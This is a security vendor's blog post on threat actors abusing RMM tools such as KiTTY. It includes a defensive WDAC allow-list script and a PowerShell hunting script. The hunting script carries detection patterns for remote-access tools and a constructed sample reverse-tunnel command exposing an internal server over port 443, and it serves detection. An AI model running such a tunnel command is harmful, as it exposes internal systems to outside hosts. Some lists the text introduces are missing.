The Power and Peril of RMM Tools


As more people work remotely, IT departments must manage devices distributed over different cities and countries relying on VPNs and remote monitoring and management (RMM) tools for system administration.

However, like any new technology, RMM tools can also be used maliciously. Threat actors can establish connections to a victim’s device and run commands, exfiltrate data, and stay undetected.

This article will cover real-world examples of RMM exploits and show you how to protect your organization from these attacks.

RMM software simplifies network management, allowing IT professionals to remotely solve problems, install software, and upload or download files to or from devices.

Unfortunately, this connection is not always secure, and attackers can use malicious software to connect their servers to a victim’s device. As these connections become easier to detect, however, ransomware-as-a-service (RaaS) groups have had to adjust their methods.

In most of the cyber incidents Varonis investigated last year, RaaS gangs employed a technique known as Living off the Land, using legitimate IT tools to gain remote control, navigate networks undetected, and steal data.

RMM tools enable attackers to blend in and evade detection. They and their traffic are typically “ignored” by security controls and organizational security policies, such as application whitelisting.

This tactic also helps script kiddies — once connected, they will find everything they need already installed and ready for them.

Our research identified two main methods attackers use to manipulate RMM tools:

Below are common RMM tools and RaaS gangs:

During a recent investigation, our Managed Data Detection and Response (MDDR) team analyzed an organization’s data and found, in the PowerShell history of a compromised device, evidence of an RMM tool named “KiTTY.”

This software was a modified version of PuTTY, a well-known tool for creating telnet and SSH sessions with remote machines. Because PuTTY is a legitimate RMM tool, none of the organization’s security software raised any red flags, so KiTTY was able to create reverse tunnels over port 443 to expose internal servers to an AWS EC2 box.

The Varonis team conducted a comprehensive analysis. They found that the sessions to the AWS EC2 box using KiTTY were key to revealing what happened, how it was done, and — most importantly — what files were stolen.

This crucial evidence was a turning point in the investigation and helped trace the entire attack chain. It also revealed the organization’s security gaps, how to address them, and the potential consequences of this attack.

Consider implementing the following strategies to reduce the chance of attackers abusing RMM tools.

Limit the number of RMM tools your organization uses, and enforce that limit with an application control policy:

One option is to create a Windows Defender Application Control (WDAC) policy using PowerShell that whitelists applications based on their publisher. It’s important to note that creating WDAC policies requires administrative privileges, and deploying them via Group Policy requires domain administrative privileges.

As a precaution, you should test the policy in audit mode before deploying it in enforce mode to avoid inadvertently blocking necessary applications.
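The steps above (publisher-based WDAC policy, administrative session, audit mode before enforce) as one worked script. This is an added example, not code from the original article or from Varonis. It uses the built-in ConfigCI cmdlets; the folder `C:\WDAC`, the policy name, and the choice of `C:\Program Files` as the scan root are assumptions, and the machine it is scanned on should be a reference build that has only the approved RMM tool installed.

```powershell
# Added example (not from the original article): build a Publisher-level WDAC
# allow-list from a reference machine, stage it in audit mode, review what it
# would have blocked, and only then switch it to enforce.
# Requires an elevated PowerShell session; Group Policy rollout additionally
# needs domain admin rights, as the article notes.
# Assumed values: the C:\WDAC working folder, the policy name and the scan root.

$WorkDir   = 'C:\WDAC'
$PolicyXml = Join-Path $WorkDir 'RmmAllowlist.xml'
$ScanRoot  = 'C:\Program Files'      # where the approved software lives on the reference machine

New-Item -ItemType Directory -Path $WorkDir -Force | Out-Null

# 1. Scan the reference install and emit Publisher rules (falling back to file
#    hashes for unsigned binaries so they are not silently skipped).
#    -UserPEs covers user-mode executables, not only drivers.
New-CIPolicy -FilePath $PolicyXml -Level Publisher -Fallback Hash `
    -ScanPath $ScanRoot -UserPEs -MultiplePolicyFormat

# 2. Name the policy so audit events are easy to attribute.
Set-CIPolicyIdInfo -FilePath $PolicyXml -PolicyName 'RMM Allowlist (example)'

# 3. Rule option 3 = "Enabled:Audit Mode". Nothing is blocked yet; every binary
#    that *would* be blocked is logged as Code Integrity event ID 3076.
Set-RuleOption -FilePath $PolicyXml -Option 3

# 4. Compile to the binary form WDAC loads. In multiple-policy format the file
#    is named after the policy GUID and lives under CiPolicies\Active.
$PolicyId  = ([xml](Get-Content $PolicyXml)).SiPolicy.PolicyID
$PolicyBin = Join-Path $WorkDir "$PolicyId.cip"
ConvertFrom-CIPolicy -XmlFilePath $PolicyXml -BinaryFilePath $PolicyBin

# 5. Stage locally on a test machine. For the fleet, push the same .cip via
#    Group Policy: Computer Configuration > Administrative Templates > System >
#    Device Guard > "Deploy Windows Defender Application Control".
Copy-Item $PolicyBin "$env:SystemRoot\System32\CodeIntegrity\CiPolicies\Active\" -Force
# On builds that ship CiTool.exe the policy can be refreshed without a reboot:
#   CiTool.exe --update-policy $PolicyBin

# 6. After the audit period, list what enforce mode would have stopped.
function Get-WdacAuditEvents {
    Get-WinEvent -FilterHashtable @{
        LogName = 'Microsoft-Windows-CodeIntegrity/Operational'
        Id      = 3076        # audit-mode "would have blocked"; 3077 is the enforced block
    } -ErrorAction SilentlyContinue |
    Select-Object TimeCreated, Message
}
Get-WdacAuditEvents | Format-List

# 7. Once the 3076 events only show software you intend to block, remove the
#    audit option, recompile and redeploy: the same policy now enforces.
Set-RuleOption -FilePath $PolicyXml -Option 3 -Delete
ConvertFrom-CIPolicy -XmlFilePath $PolicyXml -BinaryFilePath $PolicyBin
```

Leave the policy in audit mode long enough to cover a full operational cycle (patch windows, month-end jobs) before step 7; an unexpected 3076 for a legitimate updater is far cheaper to fix in audit than as a 3077 in production.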

Monitor your network traffic and logs, especially regarding RMM tools. Consider implementing services like Varonis MDDR, which provides 24x7x365 network monitoring and behavioral analysis.
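Two host-level hunts that turn the KiTTY case above (a PuTTY-derived client found in PowerShell history, tunnelling over TCP/443) into checks you can run as part of the monitoring this section recommends. This is an added example, not code from the original article or from Varonis: the tool-name list, the list of "expected" TLS client processes, and the sample history lines are all assumptions constructed for illustration and need tuning to your own estate.

```powershell
# Added example (not from the original article): hunt for remote-access tooling
# and reverse-tunnel syntax in PSReadLine history, and for outbound TCP/443
# connections owned by processes that are not expected TLS clients.
# Run in an elevated session so other users' profiles and processes are visible.
# Assumed values: the tool list, the expected-client list, the sample lines.

$RemoteAccessTools = @('kitty', 'putty', 'plink')   # extend with any RMM tool you have not approved

# A tool binary name at a token boundary, optionally with .exe
$ToolPattern   = '(?i)(^|[\s\\/"''])(' + ($RemoteAccessTools -join '|') + ')(\.exe)?(\s|$)'
# SSH/plink reverse forwarding: -R <listen-port>:<host>:<port>
$TunnelPattern = '(^|\s)-R\s*\d+:[\w.-]+:\d+'

function Find-RemoteAccessEvidence {
    # Returns one object per matching command line, with the reason(s) it matched.
    param(
        [Parameter(Mandatory)][string[]]$Lines,
        [string]$Source = 'inline'
    )
    foreach ($line in $Lines) {
        $reasons = @()
        if ($line -match $ToolPattern)   { $reasons += 'remote-access tool' }
        if ($line -match $TunnelPattern) { $reasons += 'reverse tunnel syntax' }
        if ($reasons.Count -gt 0) {
            [pscustomobject]@{ Source = $Source; Reason = ($reasons -join ', '); Command = $line }
        }
    }
}

function Get-PSHistoryEvidence {
    # Scans every user profile's PSReadLine history on this host.
    param([string]$ProfileRoot = 'C:\Users')
    $rel = 'AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt'
    Get-ChildItem -Path $ProfileRoot -Directory -ErrorAction SilentlyContinue | ForEach-Object {
        $hist = Join-Path $_.FullName $rel
        if (Test-Path $hist) {
            Find-RemoteAccessEvidence -Lines (Get-Content $hist) -Source $hist
        }
    }
}

function Get-UnexpectedTlsClients {
    # Established outbound 443 connections whose owning process is not on the expected list.
    # Process-name comparison is case-insensitive (-notcontains default).
    param([string[]]$ExpectedClients = @('chrome', 'msedge', 'firefox', 'OUTLOOK', 'ms-teams', 'svchost'))
    Get-NetTCPConnection -State Established -RemotePort 443 -ErrorAction SilentlyContinue | ForEach-Object {
        $proc = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
        if ($proc -and ($ExpectedClients -notcontains $proc.ProcessName)) {
            [pscustomobject]@{
                PID     = $_.OwningProcess
                Process = $proc.ProcessName
                Path    = $proc.Path
                Remote  = "$($_.RemoteAddress):$($_.RemotePort)"
            }
        }
    }
}

# Constructed sample history (not real evidence) showing what the matcher flags:
# the second line hits on both the tool name and the reverse-tunnel syntax.
$SampleHistory = @(
    'Get-ChildItem C:\Temp',
    'kitty.exe -ssh admin@203.0.113.10 -P 443 -R 8443:intranet.corp.local:443',
    'Restart-Service Spooler'
)
Find-RemoteAccessEvidence -Lines $SampleHistory -Source 'sample' | Format-Table -AutoSize
Get-PSHistoryEvidence | Format-Table -AutoSize
Get-UnexpectedTlsClients | Format-Table -AutoSize
```

Neither check is a substitute for central logging: PSReadLine history is trivially cleared, and a tunnel that has already been torn down leaves no live socket. Their value is as a cheap triage step, and as a template for the same logic in your EDR or SIEM, where the process and connection telemetry is retained outside the attacker's reach.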

Train your employees to identify phishing attempts and manage passwords effectively, as manipulating users is a common way attackers gain access to your network. Encourage the reporting of suspicious activity and regularly test your cybersecurity team to identify potential risks.

As technology advances, it gives an edge to both defenders and attackers, and RMM tools are just one example of the potential threats organizations face.

At Varonis, our mission is to protect what matters most: your data. Our all-in-one Data Security Platform continuously discovers and classifies critical data, removes exposures, and stops threats in real time with AI-powered automation.

Curious to see what risks might be prevalent in your environment? Get a Varonis Data Risk Assessment today.

Our free assessment takes just minutes to set up and delivers immediate value. In less than 24 hours, you’ll have a clear, risk-based view of the data that matters most and a clear path to automated remediation.

Note: This article originally appeared on the Varonis blog.
